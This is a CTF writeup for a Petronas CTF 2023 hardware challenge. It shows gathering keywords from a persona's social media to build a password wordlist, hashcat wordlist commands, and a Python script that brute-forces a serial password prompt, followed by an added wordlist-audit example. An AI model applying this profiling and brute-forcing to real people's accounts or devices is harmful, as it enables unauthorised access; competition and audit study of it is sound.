Petronas CTF 2023 Finals - A Bad Afternoon to Lose a Box Challenge Writeup

Date: Oct 13, 2023
Tags: Petronas, OnlyFeet, Hardware, OSINT, CTF
Summary: A writeup for one of the challenges in the Petronas CTF Finals 2023. It’s a mix of hardware, OSINT and scripting.
Updated: Dec 14, 2023 07:08 AM

💡 Didn’t manage to screenshot a lot of stuff for this challenge, sorry :’D

Challenge #2: A Bad Afternoon to Lose a Box


This is a hardware challenge where participants only had certain timeslots to connect to the hardware. There are no screenshots/pictures of the hardware since time was of the essence, and also because I had to return it immediately when it was solved :’)
 
The hardware itself was concealed in cardboard and black duct tape, preventing participants from visually assessing it. However, a cable was supplied to establish a connection.
 
When connected to the hardware via the cable provided, it:
  • Cannot be found in the file explorer
  • Cannot be detected as a disk
  • Does not trigger any notification that a drive was connected (at least on Windows during my attempt)
And that was because it wasn’t a drive (a very obvious fact that I realised pretty late lol). So, I opened Device Manager to find which communication (COM) port it was connected to (I would need this information later).
 
Anyways to access the content, we would need to find a way to establish a connection so I thought of using PuTTY! By choosing the serial connection type and the COM port gotten earlier, I got to establish a session.
 
The session basically prompts for a password, and returns “Incorrect password” when the user inputs a wrong password. At this point, I just assumed the correct password would output the flag.
 
Hence the only clues we have will be on the challenge description.
By reading the question, the phrase "Alita Wizard" stood out. My first thought was that I had to make a password list using this clue, set up a script to bruteforce the password list to the COM port. However, the challenge creator that walked past me said I didn’t have enough information to do so yet, hence to Google we go AHHAHAH
 
Googling “Alita Wizard” by itself will show a lot of Alita: Battle Angel (Movie) related content.
So I thought maybe it was a cybersecurity wizard named Alita? But I found nothing as well. At this point, I thought what if it's an actual person’s name? So I tried to find any mentions of this name on social media.
 
Searching “Alita Wizard” on Instagram will give you an account:
My intent was to gather more keywords to be added to the password bruteforce list, so by looking at the Instagram account, I got a few of them:
  • Dog
  • Beagle (Dog breed)
  • Desserts
  • Cupcake
 
I also tried searching “Alita Wizard” on Twitter / X, which will also give you another account:
My intent was to gather more keywords to be added to the password bruteforce list, so by looking at the Twitter account, I got a few of them as well:
  • Dog
  • Muffin (I narrowed it down from dessert to muffin because of the Kenny Rogers Roasters post)
 
I tried searching for other social media using other tools like Sherlock etc, but couldn’t find any. So I decided to work on the word list.
I first gathered my list of keywords, and placed it in list.txt:
```
dog
beagle
muffin
alita
wizard
```
 
Since the social media handles had the year 1993 appended behind, I decided to append the year to the wordlist as well using this command:
```bash
for i in $(cat list.txt); do echo $i; echo ${i}1993; echo ${i}93; done >> list2.txt
```
Contents of list2.txt:
```
dog
dog1993
dog93
beagle
beagle1993
beagle93
muffin
muffin1993
muffin93
alita
alita1993
alita93
wizard
wizard1993
wizard93
```
 
Now it is time to pick the rule. I actually picked the best64.rule by HashCat and bruteforced that list. But since it was taking too much time, I tried the capitalization of the first character and combination of the words as a bare minimum wordlist resort (lol).
```bash
# Making a custom rule to capitalize the first character
echo c > custom.rule

# Using the custom rule to generate a new wordlist
hashcat --force --stdout list2.txt -r custom.rule > list3.txt

# Combining the two wordlists together
hashcat --force --stdout -a 1 list2.txt list3.txt > final_list.txt
hashcat --force --stdout -a 1 list3.txt list2.txt >> final_list.txt
```
 
Next, I scripted a Python script that uses the serial module to send commands from the final_list.txt file to a USB device connected at the COM port earlier.
```python
import serial
import time

# Specify the COM port
com_port = "COM7"

# Create a Serial object
ser = serial.Serial(port=com_port, baudrate=9600, timeout=1)

# Function to send command and receive response
def send_command(command):
    # Send command
    ser.write(command.encode('utf-8'))
    # Wait for a short duration to allow response to be received (I adjusted this a lot)
    time.sleep(10)
    # Read and return response
    response = ser.read_all().decode('utf-8')
    return response

# Read commands from the list and send them
with open("final_list.txt", "r") as file:
    commands = file.readlines()

for command in commands:
    response = send_command(command.strip())
    print(f"Command: {command.strip()}\nResponse: {response}\n")

# Close the serial port
ser.close()
```
It had an error initially about being unable to connect to the COM port, but it turns out it was because the COM port allows only one application or instance to connect to it at a time (I had the PuTTY session running in the background as well when I ran the code, oops). This is because serial communication involves sending data sequentially, and having multiple applications accessing the port simultaneously could lead to conflicts and data corruption.
 
So by closing the PuTTY session and running the code, we get the correct passcode and the flag!
Password: muffinBeagle1993
petgrad2023{Th3_Qu@n7um_N3xu$_Pr0t0typ3}
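
Added example, not part of the original writeup: a pure-Python rebuild of the list2.txt / list3.txt / final_list.txt steps that counts the candidates and checks whether a given password falls inside them, which also works as a quick audit of any password against keywords visible on public profiles. The function names are made up for this example, and the 10-second figure is the time.sleep(10) from the serial script.

```python
# Added example: reproduces the writeup's wordlist pipeline without hashcat.
KEYWORDS = ["dog", "beagle", "muffin", "alita", "wizard"]  # list.txt in the writeup
SUFFIXES = ["", "1993", "93"]   # shell loop: word, word1993, word93
SECONDS_PER_GUESS = 10          # time.sleep(10) in the serial script


def with_suffixes(words, suffixes=SUFFIXES):
    """Equivalent of the shell loop that produced list2.txt."""
    return [w + s for w in words for s in suffixes]


def capitalize_rule(words):
    """Equivalent of hashcat rule 'c': first character upper, rest lower."""
    return [w[:1].upper() + w[1:].lower() for w in words]


def combine(left, right):
    """Equivalent of hashcat -a 1: each left word joined to each right word."""
    return [a + b for a in left for b in right]


def build_final_list(keywords=KEYWORDS):
    """list2 x list3 followed by list3 x list2, as in final_list.txt."""
    list2 = with_suffixes(keywords)
    list3 = capitalize_rule(list2)
    return combine(list2, list3) + combine(list3, list2)


def audit(password, keywords=KEYWORDS):
    """Say whether a password is derivable from the keywords, and how long
    trying the whole list takes at one guess per SECONDS_PER_GUESS."""
    candidates = set(build_final_list(keywords))
    return {
        "candidates": len(candidates),
        "in_list": password in candidates,
        "seconds_full_list": len(candidates) * SECONDS_PER_GUESS,
    }


if __name__ == "__main__":
    for pw in ("muffinBeagle1993", "MuffinBeagle1993"):
        print(pw, audit(pw))
```

Five public keywords expand to only 450 candidates, so even at one guess every 10 seconds the whole list is exhausted in 75 minutes.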